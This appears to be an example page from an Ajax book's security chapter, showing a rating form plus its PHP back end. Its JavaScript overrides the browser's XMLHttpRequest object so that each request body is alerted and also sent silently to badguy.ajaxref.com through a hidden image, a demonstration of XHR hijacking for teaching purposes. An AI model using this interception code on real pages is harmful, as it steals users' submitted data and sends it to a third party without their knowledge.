Examples: XHR Hijack - Full using Prototype

Hijacking XHRs with JavaScript

Scenario

In this example we modify our hijack approach to make a copy of the XHR object and then overwrite the entire object with a new locally created object that acts just like the original XHR by accessing the save methods but has our "snooping" code in place as well. We alert out the values you picked as well as the response but we also send it to our "hacker" site badguy.ajaxref.com using an image transport. Go look for yourself link.

The purpose of this example is to show that it is not a library specific issue, you are overriding the XHR deep enough the library in play is irrelevant.

Important Firebug Users - You must disable Firebug for this to work!

How do you feel about Ajax Security?

Front End
Back End

view plain print

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Chapter 7 : Security - Prototype Hijack </title>
<link rel="stylesheet" href="https://ajaxref.com/ch7/global.css" type="text/css" media="screen" />

<script src="https://ajaxref.com/lib/prototype/prototype.js" type="text/javascript">

</script>

<script type="text/javascript">

 
 
function rate(form)
{
    var options = {
        method: "post",
        parameters: $("ratingForm").serialize(true)
    };
    
    new Ajax.Updater("responseOutput", "https://ajaxref.com/ch3/setrating.php", options);
}
 
window.onload = function () 
{ 
 var radios = document.getElementsByName('rating');
 for (var i = 0; i < radios.length; i++)
  {
   radios[i].onclick = function (){rate(this.form);}; 
  }
  
};
 
 
var xmlreqc=XMLHttpRequest;
XMLHttpRequest = function() {
    this.xhr = new xmlreqc();
    return this;
};
 
XMLHttpRequest.prototype.open = function (method, url, async, user, password)
{
    alert(url);
    return this.xhr.open(method, url, async, user, password); //send it on
};
 
XMLHttpRequest.prototype.setRequestHeader = function(header, value)
{
    alert(header + ": " + value);
    this.xhr.setRequestHeader(header, value);
    
};
 
XMLHttpRequest.prototype.send = function(postBody)
{
    alert(postBody);
    
    var image = document.createElement("img");
    image.style.width = "1px";
    image.style.height = "1px";
    image.style.visibility = "hidden";
    document.body.appendChild(image);
    image.src = "http://badguy.ajaxref.com/ch7/savehijack.php?data=" + postBody;
    
    var myXHR = this;
    
    this.xhr.onreadystatechange = function(){myXHR.onreadystatechangefunction();};
    this.xhr.send(postBody);
};
 
XMLHttpRequest.prototype.onreadystatechangefunction = function()
{
    if (this.xhr.readyState == 4)
           alert(this.xhr.responseText);
        
    try{
        this.readyState = this.xhr.readyState;
        this.responseText = this.xhr.responseText;
        this.responseXML = this.xhr.responseXML;
        this.status = this.xhr.status;
        this.statusText = this.xhr.statusText;
    }
    catch(e){}
    
    this.onreadystatechange();
    
};

</script>

 
</head>
<body>
 
<div class="content">
<h1>Hijacking XHRs with JavaScript</h1>
 
<div id="scenarios" class="content">
    <h3>Scenario</h3>
    <p>In this example we modify our hijack approach to make a copy of the XHR object and then
    overwrite the entire object with a new locally created object that acts just like the 
    original XHR by accessing the save methods but has our "snooping" code in place as well. We
    alert out the values you picked as well as the response but we also send it to our "hacker" site badguy.ajaxref.com
    using an image transport.  Go look for yourself <a href="http://badguy.ajaxref.com/ch7/hijack.txt" target="_blank">link</a>.<br /><br />
The purpose of this example is to show that it is not a library specific issue, you are overriding the XHR deep enough the library in play is irrelevant.   
    </p>
    <p>
     <strong>Important Firebug Users - You must disable Firebug for this to work!</strong>
    </p>
</div>    
</div>
 
<div class="content">
<h3>How do you feel about Ajax Security?</h3>
<form action="#" method="get" name="ratingForm" id="ratingForm">
<em>Who cares... - </em> [
<input type="radio" name="rating" value="1" /> 1
<input type="radio" name="rating" value="2" /> 2
<input type="radio" name="rating" value="3" /> 3
<input type="radio" name="rating" value="4" /> 4
<input type="radio" name="rating" value="5" /> 5
] <em> - Scared out of my mind</em>
</form>
<br />
<div id="responseOutput">&nbsp;</div>
</div>
 
</body>
</html>

view plain print

<?php
 
if (isset($_REQUEST["delay"]) && is_numeric($_REQUEST["delay"]))
    sleep($_REQUEST["delay"]);
 
/* File to write to */
$theFile = "ratings.txt";
$totalsFile = "totals.txt";
 
/* pull the user ratings via the query string */
$rating = htmlentities(substr(urldecode(gpc("rating")),0,1024));
$comment = htmlentities(substr(urldecode(gpc("comment")),0,1024));
$response = strtolower(htmlentities(substr(urldecode(gpc("response")),0,1024)));
$error = htmlentities(substr(urldecode(gpc("error")),0,1024));
$callback = htmlentities(substr(urldecode(gpc("callback")),0,1024));
$validdtd = htmlentities(substr(urldecode(gpc("validdtd")),0,1024));
 
if ($rating == "")
    $rating = 0;
 
$transport = "XHR";
 
if ($response == "")
    $response = "html";
 
/* if error is set, set appropriate header and then return */
if ($error != "")
{
    if ($error == "404")
    header("HTTP/1.1 404 Not Found\n\n");
    else
    header("HTTP/1.1 500 Internal Server Error\n\n");
 
    exit;
}
 
 
/* record the IP address and time */
$userIP =  $_SERVER['REMOTE_ADDR'];;
$currentTime = date("M d y h:i:s A");
 
/* open the file and get the contents */
$filehandle = fopen($theFile, "r");
if ($filehandle)
{
    $data = fread($filehandle, filesize($theFile));
    fclose($filehandle);
}
else
   die('Failed to read file');
 
 
/* open the file and write line to the top of the file */    
$filehandle = fopen($theFile, "w+");
if ($filehandle) 
{
    fwrite($filehandle,"$rating\t $transport\t $userIP @ $currentTime\t $comment\n");
    fwrite($filehandle, $data);
    fclose($filehandle);
}
else
    die('Failed to write file');
 
//get the totals
$votes = $total = $average = 0;
$filehandle = fopen($totalsFile, "r+");
if ($filehandle) 
{
    $line = fgets($filehandle, 4096);
    $tokens = explode("\t", $line);
 
    if (count($tokens) > 1)
    {
        $votes = $tokens[0] + 1;
        $total = $tokens[1] + $rating;
    }
 
    fclose($filehandle);
}
else
    die('Failed to read file');
 
$filehandle = fopen($totalsFile, "w+");
if ($filehandle) 
{
    fwrite($filehandle,"$votes\t$total\n");
    fclose($filehandle);
}
else
    die('Failed to write file');
 
if ($votes != 0) $average = round(($total/$votes), 2);
 
// send the right headers
header("Cache-Control: no-cache");
header("Pragma: no-cache");
header("Ajax-Response-Type: $response");
$message = "";
 
if ($response == "html")
{
    $message = "Thank you for voting.  You rated this a <strong>$rating</strong>.  There are <strong>$votes</strong> total votes.  The average is <strong>$average</strong>.  You can see the ratings in the <a href='https://ajaxref.com/ch3/ratings.txt' target='_blank'>ratings file</a>";
}
else if ($response == "text")
{
    $message = "Thank you for voting.  You rated this a $rating.  There are $votes total votes.  The average is $average.";
} 
else if ($response == "csv")
{
    $message = "$rating,$average,$votes";
}    
else if ($response == "encoded")
{
    $msg = "Thank you for voting.  You rated this a <strong>$rating</strong>.  There are <strong>$votes</strong> total votes.  The average is <strong>$average</strong>.  You can see the ratings in the <a href='https://ajaxref.com/ch3/ratings.txt' target='_blank'>ratings file</a>";
    $message = base64_encode($msg);
}
else if ($response == "xml")
{
    header("Content-Type: text/xml");
 
    $message = 
    "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>
    <!DOCTYPE pollresults SYSTEM \"ratings.dtd\">
        <pollresults>
        <rating>$rating</rating>
        <average>$average</average>
        <votes id=\"votes\"";
        
    if ($validdtd == "false")
        $message .= " name=\"votes\"";
    
    $message .= ">$votes</votes>
        </pollresults>
    " ;
 
}
else if ($response == "xmlbad")
{
    header("Content-Type: text/xml");
 
    $message = 
    "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\r\n
        <pollresults>\r\n
 
        <rating>$rating</rating>\r\n
        <average>$average\r\n
        <votes>$votes</votes>\r\n
 
        </pollresults>\r\n
    " ;
 
}
else if ($response == "json")
{
    require_once('JSON.php');
    $json = new Services_JSON();
    $jsonResponse = new ResponseData();
    $jsonResponse->rating = $rating;
    $jsonResponse->votes = $votes;
    $jsonResponse->average = $average;
 
    $message = $json->encode($jsonResponse);
}
else if ($response == "javascript")
{
    $message = "
        var responseOutput = document.getElementById(\"responseOutput\");
        responseOutput.innerHTML += 'Thank you for voting.  You rated this a <strong>$rating</strong>.  There are <strong>$votes</strong> total votes.  The average is <strong>$average</strong>.  You can see the ratings in the <a href=\"https://ajaxref.com/ch3/ratings.txt\" target=\"_blank\">ratings file</a>';
    ";
 
}
 
echo $message;
 
/* Helper functions */
function gpc($name)
{
    if (isset($_GET[$name]))
    return $_GET[$name];
    else if (isset($_POST[$name]))
    return $_POST[$name];
    else if (isset($_COOKIE[$name]))
    return $_COOKIE[$name];
    else
    return "";
}
 
 
class ResponseData
{
    public $average = 0;
    public $rating = 0;
    public $votes = 0;
    public $total = 0;
}
 
?>